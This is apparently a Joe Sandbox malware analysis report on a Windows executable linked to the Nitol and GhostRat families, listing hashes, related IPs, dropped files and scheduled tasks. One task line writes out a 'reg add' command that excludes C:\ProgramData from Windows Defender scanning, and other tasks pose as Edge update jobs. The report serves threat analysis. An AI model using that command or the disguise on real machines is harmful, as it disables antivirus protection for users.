                        		unknownSingapore
                        		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue

                        General Information

                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1584369
                        Start date and time:2025-01-05 10:09:45 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 8m 52s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Run name:Run with higher sleep bypass
                        Number of analysed new started processes analysed:48
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:2b687482300.6345827638.08.exe
                        Detection:MAL
                        Classification:mal100.evad.winEXE@65/29@12/3
                        EGA Information:
                        • Successful, ratio: 75%
                        HCA Information:
                        • Successful, ratio: 88%
                        • Number of executed functions: 16
                        • Number of non-executed functions: 116
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                        • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                        Warnings

                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                        • Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.245.163.56, 13.95.31.18, 20.109.210.53
                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Execution Graph export aborted for target G5CQjd.exe, PID 4548 because there are no executed function
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        10:11:39Task SchedulerRun new task: lbo8Y path: C:\Users\user\Documents\EMp3o1.exe
                        10:12:13Task SchedulerRun new task: Task1 path: cmd.exe s>/c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                        10:12:50Task SchedulerRun new task: MicrosoftEdgeUpdateTaskUA Task-S-1-5-18 mhBgH path: C:\Program Files (x86)\G5CQjd\G5CQjd.exe
                        10:12:52Task SchedulerRun new task: MicrosoftEdgeUpdateTaskUA Task-S-1-5-18 N6cBd path: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exe

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        118.178.60.945631.exeGet hashmaliciousNitolBrowse
                          0000000000000000.exeGet hashmaliciousNitolBrowse
                            T1#U5b89#U88c5#U52a9#U624b1.0.2.exeGet hashmaliciousNitolBrowse

                              Domains

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com45631.exeGet hashmaliciousNitolBrowse
                              • 118.178.60.9
                              0000000000000000.exeGet hashmaliciousNitolBrowse
                              • 118.178.60.9
                              T1#U5b89#U88c5#U52a9#U624b1.0.2.exeGet hashmaliciousNitolBrowse
                              • 118.178.60.9

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCarmv7l.elfGet hashmaliciousUnknownBrowse
                              • 8.212.89.249
                              Josho.x86.elfGet hashmaliciousUnknownBrowse
                              • 47.235.55.179
                              file.exeGet hashmaliciousXRedBrowse
                              • 47.254.187.72
                              file.exeGet hashmaliciousXRedBrowse
                              • 47.254.187.72
                              https://www.gazeta.ru/politics/news/2024/12/22/24684854.shtmlGet hashmaliciousHTMLPhisherBrowse
                              • 47.253.61.56
                              45631.exeGet hashmaliciousNitolBrowse
                              • 8.217.152.240
                              Hilix.mpsl.elfGet hashmaliciousMiraiBrowse
                              • 8.208.198.92
                              0000000000000000.exeGet hashmaliciousNitolBrowse
                              • 8.217.35.192
                              x86_64.elfGet hashmaliciousMirai, MoobotBrowse
                              • 8.211.209.238
                              letsVPN.exeGet hashmaliciousUnknownBrowse
                              • 8.223.56.120
                              CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdN5kEzgUBn6.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                              • 101.201.227.94
                              N5kEzgUBn6.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                              • 101.201.227.94
                              3.elfGet hashmaliciousUnknownBrowse
                              • 8.189.180.251
                              3.elfGet hashmaliciousUnknownBrowse
                              • 8.138.48.163
                              armv6l.elfGet hashmaliciousUnknownBrowse
                              • 223.4.27.34
                              armv5l.elfGet hashmaliciousUnknownBrowse
                              • 8.130.140.184
                              fuckunix.sh4.elfGet hashmaliciousMiraiBrowse
                              • 8.158.86.51
                              Fantazy.i686.elfGet hashmaliciousUnknownBrowse
                              • 8.132.136.89
                              Fantazy.sh4.elfGet hashmaliciousUnknownBrowse
                              • 47.114.163.84
                              CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdN5kEzgUBn6.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                              • 101.201.227.94
                              N5kEzgUBn6.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                              • 101.201.227.94
                              3.elfGet hashmaliciousUnknownBrowse
                              • 8.189.180.251
                              3.elfGet hashmaliciousUnknownBrowse
                              • 8.138.48.163
                              armv6l.elfGet hashmaliciousUnknownBrowse
                              • 223.4.27.34
                              armv5l.elfGet hashmaliciousUnknownBrowse
                              • 8.130.140.184
                              fuckunix.sh4.elfGet hashmaliciousMiraiBrowse
                              • 8.158.86.51
                              Fantazy.i686.elfGet hashmaliciousUnknownBrowse
                              • 8.132.136.89
                              Fantazy.sh4.elfGet hashmaliciousUnknownBrowse
                              • 47.114.163.84

                              JA3 Fingerprints

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              37f463bf4616ecd445d4a1937da06e19K27Yg4V48M.exeGet hashmaliciousLummaCBrowse
                              • 39.103.20.34
                              • 118.178.60.9
                              IH5XqCdf06.exeGet hashmaliciousLummaCBrowse
                              • 39.103.20.34
                              • 118.178.60.9
                              Tax_Refund_Claim_2024_Australian_Taxation_Office.jsGet hashmaliciousRemcosBrowse
                              • 39.103.20.34
                              • 118.178.60.9
                              c2.htaGet hashmaliciousRemcosBrowse
                              • 39.103.20.34
                              • 118.178.60.9
                              file.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                              • 39.103.20.34
                              • 118.178.60.9
                              J18zxRjOes.exeGet hashmaliciousLummaCBrowse
                              • 39.103.20.34
                              • 118.178.60.9
                              HGwpjJUqhW.exeGet hashmaliciousGhostRatBrowse
                              • 39.103.20.34
                              • 118.178.60.9
                              http://www.cipassoitalia.it/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                              • 39.103.20.34
                              • 118.178.60.9

                              Dropped Files

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              C:\Program Files (x86)\G5CQjd\G5CQjd.exe45631.exeGet hashmaliciousNitolBrowse
                                0000000000000000.exeGet hashmaliciousNitolBrowse
                                  T1#U5b89#U88c5#U52a9#U624b1.0.2.exeGet hashmaliciousNitolBrowse
                                    setup.ic19.exeGet hashmaliciousGhostRat, NitolBrowse
                                      C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exe45631.exeGet hashmaliciousNitolBrowse
                                        0000000000000000.exeGet hashmaliciousNitolBrowse
                                          T1#U5b89#U88c5#U52a9#U624b1.0.2.exeGet hashmaliciousNitolBrowse
                                            setup.ic19.exeGet hashmaliciousGhostRat, NitolBrowse

                                              Created / dropped Files

                                              C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exe

                                              Download File
                                              Process:C:\Program Files (x86)\G5CQjd\G5CQjd.exe
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):54152
                                              Entropy (8bit):6.64786972992462
                                              Encrypted:false
                                              SSDEEP:768:jE8w9LlgD9z/4vt+aEjzaXEjoN6Fdv9SqJvwjgCb2VIIL/o/rw3J:jE3LKDZjaEjza0jJRJviN21ME3J
                                              MD5:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                              SHA1:E33722B4790B3C83B6F180E57D1B6BEBBC6153CB
                                              SHA-256:7BAFB7B02EA7C52D3511F3AC21C0586E92C44738AD992D63463AADC260C81722
                                              SHA-512:E2B4B8F5379D3ADBB5280D1C77C2AA7F5A7212173231576BAC6D7A26109B88BC5CB377CF9D879E7BE2E36CE860C9BCDA7769A22EED5ED63797F70534C6CDDA4C
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Joe Sandbox View:
                                              • Filename: 45631.exe, Detection: malicious, Browse
                                              • Filename: 0000000000000000.exe, Detection: malicious, Browse
                                              • Filename: T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, Detection: malicious, Browse
                                              • Filename: setup.ic19.exe, Detection: malicious, Browse
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........%U..vU..vU..vK.pvL..vK.avE..vK.wv...v\.gv\..vU..v...vK.~vW..vK.`vT..vK.evT..vRichU..v........PE..L....B.O.................b...@....................@..................................g....@.....................................d.......\................-..........P...............................0...@............................................text....a.......b.................. ..`.rdata...............f..............@..@.data...............................@....rsrc...\...........................@..@.reloc..`...........................@..B........................................................................................................................................................................................................................................................................................................................................

                                              C:\Program Files (x86)\E2ky7uqb\log.src

                                              Download File
                                              Process:C:\Program Files (x86)\G5CQjd\G5CQjd.exe
                                              File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):5059989
                                              Entropy (8bit):7.999955222860491
                                              Encrypted:true
                                              SSDEEP:98304:ZOQ8oQBU091MWehE/7o29Mtr9vBGTrBkm638mgfttxtoSrHCYE7GUcOc2s:wo6T1MFhE/7qJwBP6TWtttriYE7kjv
                                              MD5:3912C2B1DFAA78E98CE360ABDC6F9D2C
                                              SHA1:FA7489D7413819F503E27ACA1795F5A5135FA216
                                              SHA-256:FDF752F8CEF49AEAEBE5CA551BDA47BD395BF6E375C9B70D31D5E1DF985D1E08
                                              SHA-512:0FF6CB9E43EFBD4546DB323F84BFE72661780490749FD441B803DE58392F9390A716533A0E0A35F6CA3341AC089E29724C66EC5096810A1BECD68F1C83F7DBD6
                                              Malicious:false
                                              Preview:.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..f..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....|]....Ke......G......U..1....#^..1|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?*.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)..*..t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...

                                              C:\Program Files (x86)\E2ky7uqb\tbcore3U.dll

                                              Download File
                                              Process:C:\Program Files (x86)\G5CQjd\G5CQjd.exe
                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):4858192
                                              Entropy (8bit):7.992516619163859
                                              Encrypted:true
                                              SSDEEP:98304:9RK1dm+O6P0DvHI/Tvyegz2UrrrjRyBEXp0/aeuZmQQLFXfoGku+i17/U:9S4+O6P5OeMRrjRy7aPZbm3k8V/U
                                              MD5:DA7CE72C562FBE3CD9074EE4EE00A9C5
                                              SHA1:27B82B4E1C12EDABABF2D2BA808C43B930FD70C2
                                              SHA-256:8BC43B178CE4438C84A53A1C3FC45F1F35C0033A9B76863BC99D3E2D06D1222E
                                              SHA-512:D672222449CD71ED91A089C4C0074007644872841D3AA5B6B61D3C12168D45E8F3E28F88D3C1A6EEC7A299B36F160C6C7D4047C81D300CC9730A26AAC6CCDA85
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...~..f...........!...'.,..........D)D......@................................s...........@...........................3.R.....D.P....ps...............I.(K...Ps......................................Ks.@.............).,............................text...s+.......................... ..`.rdata...n...@......................@..@.data...............................@....%?.....O.'......................... ..`.%-[....|.....).....................@....mo:....P.I...)...I................. ..`.reloc.......Ps.......I.............@..@.rsrc........ps.......I.............@..@................................................................................................................................................................................................................................................................................................................

                                              C:\Program Files (x86)\E2ky7uqb\utils.vcxproj

                                              Download File
                                              Process:C:\Program Files (x86)\G5CQjd\G5CQjd.exe
                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                              Category:dropped
                                              Size (bytes):365477
                                              Entropy (8bit):7.99939968455859
                                              Encrypted:true
                                              SSDEEP:6144:5iACk/u6n9aBOmmD1oQFu0oMOxKnJPWyD9Dcqt1oFsnKqW7mbZ:Y8u69CghoQxoMTFQqtKFCG7mbZ
                                              MD5:587FBD020367AB102ED7B3BF57BAE468
                                              SHA1:A7DA06B44DC7128E23B4C28432FCF947C9BC4C51
                                              SHA-256:E7CE5CA853B0F2DB754D648D3CA9218C6C296490E05FA1F777936DAF439BE340
                                              SHA-512:83D88531792FD67AA546FCD1E97300C0080F3022DC53D5045797887CED520E835631A7F0259E398E63467A3093970C143CE4B93C2DAB34F3827630BE75F7F204
                                              Malicious:false
                                              Preview:......JFIF.............ZExif..MM.*.................J............Q...........Q..........%Q..........%...............C....................................................................C.......f...............................................................7.K.."............................................................}........!1A..<a."q.2....#B...R..$3br........%&'()*456789:CDEF8.217.47.169....."ijstuvwxyz....cvqthu.net......3#..............47.169....................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{|}~........=..>.A

                                              C:\Program Files (x86)\G5CQjd\G5CQjd.exe

                                              Download File
                                              Process:C:\Users\user\Documents\EMp3o1.exe
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):54152
                                              Entropy (8bit):6.64786972992462
                                              Encrypted:false
                                              SSDEEP:768:jE8w9LlgD9z/4vt+aEjzaXEjoN6Fdv9SqJvwjgCb2VIIL/o/rw3J:jE3LKDZjaEjza0jJRJviN21ME3J
                                              MD5:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                              SHA1:E33722B4790B3C83B6F180E57D1B6BEBBC6153CB
                                              SHA-256:7BAFB7B02EA7C52D3511F3AC21C0586E92C44738AD992D63463AADC260C81722
                                              SHA-512:E2B4B8F5379D3ADBB5280D1C77C2AA7F5A7212173231576BAC6D7A26109B88BC5CB377CF9D879E7BE2E36CE860C9BCDA7769A22EED5ED63797F70534C6CDDA4C
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Joe Sandbox View:
                                              • Filename: 45631.exe, Detection: malicious, Browse
                                              • Filename: 0000000000000000.exe, Detection: malicious, Browse
                                              • Filename: T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, Detection: malicious, Browse
                                              • Filename: setup.ic19.exe, Detection: malicious, Browse
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........%U..vU..vU..vK.pvL..vK.avE..vK.wv...v\.gv\..vU..v...vK.~vW..vK.`vT..vK.evT..vRichU..v........PE..L....B.O.................b...@....................@..................................g....@.....................................d.......\................-..........P...............................0...@............................................text....a.......b.................. ..`.rdata...............f..............@..@.data...............................@....rsrc...\...........................@..@.reloc..`...........................@..B........................................................................................................................................................................................................................................................................................................................................

                                              C:\Program Files (x86)\G5CQjd\log.src

                                              Download File
                                              Process:C:\Users\user\Documents\EMp3o1.exe
                                              File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):5059989
                                              Entropy (8bit):7.999955225588572
                                              Encrypted:true
                                              SSDEEP:98304:YOQ8oQBU091MWehE/7o29Mtr9vBGTrBkm638mgfttxtoSrHCYE7GUcOc2s:/o6T1MFhE/7qJwBP6TWtttriYE7kjv
                                              MD5:C927ED45B796C105629BEAA242FD141D
                                              SHA1:A66875C89F6D1CBB4EB9E556A5012722743D6BF8
                                              SHA-256:F699A056981C745F171A7D86E29227B38E8E0F4A2C3BDA2C64CC6C0822A70BF6
                                              SHA-512:C0655F6600C314BED8308EE2867E2BDC75C7CF48331C10AB88456C1A7D6D11AC0569CFF75274E12BCC3CA6BBC6322071BB2DA653DA9B149803380673A32483B3
                                              Malicious:false
                                              Preview:.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....|]....Ke......G......U..1....#^..1|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?*.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)..*..t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...

                                              C:\Program Files (x86)\G5CQjd\tbcore3U.dll

                                              Download File
                                              Process:C:\Users\user\Documents\EMp3o1.exe
                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):4858192
                                              Entropy (8bit):7.992517251438112
                                              Encrypted:true
                                              SSDEEP:98304:9RK1dm+O6P0DvHI/Tvyegz2UrrrjRyBEXp0/aeuZmQQLFXfoGku+i17/i:9S4+O6P5OeMRrjRy7aPZbm3k8V/i
                                              MD5:5EBD0FB39ECDA30C0398D78F58A95069
                                              SHA1:83D29A3D91ADC8B7CBB3E32D5A1307AE3B8FE430
                                              SHA-256:4E4133AD000B8E49C9A513076C32B5E4FFE9F41355B301BC4731843FE05ABC8A
                                              SHA-512:7799B4FE5736E020A6B3489269D27628ADB71BD383496E0F22124786B0888CCE61CB440EAA580FABC544C3009F6ECCFC670E4259DBEDA3477CB23C6730C7FEF2
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...~..f...........!...'.,..........D)D......@................................s...........@...........................3.R.....D.P....ps...............I.(K...Ps......................................Ks.@.............).,............................text...s+.......................... ..`.rdata...n...@......................@..@.data...............................@....%?.....O.'......................... ..`.%-[....|.....).....................@....mo:....P.I...)...I................. ..`.reloc.......Ps.......I.............@..@.rsrc........ps.......I.............@..@................................................................................................................................................................................................................................................................................................................

                                              C:\Program Files (x86)\G5CQjd\utils.vcxproj

                                              Download File
                                              Process:C:\Users\user\Documents\EMp3o1.exe
                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                              Category:dropped
                                              Size (bytes):365477
                                              Entropy (8bit):7.999399537103939
                                              Encrypted:true
                                              SSDEEP:6144:ZiACk/u6n9aBOmmD1oQFu0oMOxKnJPWyD9Dcqt1oFsnKqW7mbZ:48u69CghoQxoMTFQqtKFCG7mbZ
                                              MD5:8DEB08E5D28A1E70D24AC2BA55692F0E
                                              SHA1:B70EF69CE9FF30C03D70B620C41DCA0D218AABB2
                                              SHA-256:E4B321095508F047F4937134D21DBD0236813FB8347A61799A60E8029F73BC02
                                              SHA-512:92F51EA4C748D85FFDC92DD42EC60384BEF4C6B485E080B502D6E117D47D305EB2B5F443540FD85330D0D3086AE7600728E779A95E108B6C8E7ED2088A642991
                                              Malicious:false
                                              Preview:......JFIF.............ZExif..MM.*.................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..<a."q.2....#B...R..$3br........%&'()*456789:CDEF8.217.47.169....."ijstuvwxyz....cvqthu.net......3#..............47.169....................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{|}~........=..>.A

                                              C:\Users\Public\Music\destopbak.ini

                                              Download File
                                              Process:C:\Users\user\Documents\EMp3o1.exe
                                              File Type:MIPSEB MIPS-III ECOFF executable
                                              Category:modified
                                              Size (bytes):2
                                              Entropy (8bit):1.0
                                              Encrypted:false
                                              SSDEEP:3:s:s
                                              MD5:7E74F75663E5B5A4F3452A4C603EE45D
                                              SHA1:D5114B086B721F2C87EA7152025792958AB4C629
                                              SHA-256:DD1E2826C0124A6D4F7397A5A71F633928926C0608B62FB9E615BA778ACC39FF
                                              SHA-512:2F5D0D45593487BEBC2CCF968EAF2A4A3BDE1D5A29C7C2B5AD411E041C0D3B7A46BE439ED7083093057A96030683B9DEFBED1A2EF7882B3E64CF3FBC7C9CF12F
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:.@

                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\FOM-51[1].jpg

                                              Download File
                                              Process:C:\Users\user\Documents\EMp3o1.exe
                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                              Category:dropped
                                              Size (bytes):4859125
                                              Entropy (8bit):7.999956261017207
                                              Encrypted:true
                                              SSDEEP:98304:iwS8fBFQmSDP3eB/FsE7wRnIdq//xvpY/gMQ+nQxcweXxpuQ6SutPQNCG0o:iwSgTQfFAwdCqRvpk5QvxcwgXMSutTo
                                              MD5:EE6CA3EEA7F9B1C81059AEF570A28C02
                                              SHA1:14EFBF498356644D9B1327407E3F03E1BFBEA363
                                              SHA-256:A2065EA035C4E391C0FD897A932DCFF34D2CCD34579844C732F3577BC443B196
                                              SHA-512:563E7D7AB4A94505F1EFA5931F685A45D89CCB27A97593BF69C668AAA747C9511C8BE2AADA2E4DF3E9AB02559B564C699A8A9501B70420FAC3556758E29478D5
                                              Malicious:false
                                              Preview:......JFIF.............ZExif..MM.*.................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{|}~........=..>.A

                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\b[1].gif

                                              Download File
                                              Process:C:\Users\user\Desktop\2b687482300.6345827638.08.exe
                                              File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):125333
                                              Entropy (8bit):7.993522712936246
                                              Encrypted:true
                                              SSDEEP:3072:8vcsO9vKcSrCpJigTY1mZzj283zsY+oOVoPj24pq:8vcXfSWT3TY1mZf13zB+a72Uq
                                              MD5:2CA9F4AB0970AA58989D66D9458F8701
                                              SHA1:FE5271A6D2EEBB8B3E8E9ECBA00D7FE16ABA7A5B
                                              SHA-256:5536F773A5F358F174026758FFAE165D3A94C9C6A29471385A46C1598CFB2AD4
                                              SHA-512:AB0EF92793407EFF3A5D427C6CB21FE73C59220A92E38EDEE3FAACB7FD4E0D43E9A1CF65135724686B1C6B5D37B8278800D102B0329614CB5478B9CECB5423C7
                                              Malicious:false
                                              Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\s[1].jpg

                                              Download File
                                              Process:C:\Users\user\Desktop\2b687482300.6345827638.08.exe
                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                              Category:dropped
                                              Size (bytes):8299
                                              Entropy (8bit):7.9354275320361545
                                              Encrypted:false
                                              SSDEEP:192:plfK6KTBKkGUy8DJdg0ANCT/0E/jiG4hMrnv2:pBK6KTBZGWvg0ANCT/WGFv2
                                              MD5:9BDB6A4AF681470B85A3D46AF5A4F2A7
                                              SHA1:D26F6151AC12EDC6FC157CBEE69DFD378FE8BF8A
                                              SHA-256:5207B0111DC5CC23DA549559A8968EE36E39B5D8776E6F5B1E6BDC367937E7DF
                                              SHA-512:5930985458806AF51D54196F10C3A72776EFDDA5D914F60A9B7F2DD04156288D1B8C4EB63C6EFD4A9F573E48B7B9EFE98DE815629DDD64FED8D9221A6FB8AAF4
                                              Malicious:false
                                              Preview:......JFIF.............ZExif..MM.*.................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE...............CHI........[..>G..*C..&.!7*..E..)U&.$...z.tuv......?..............

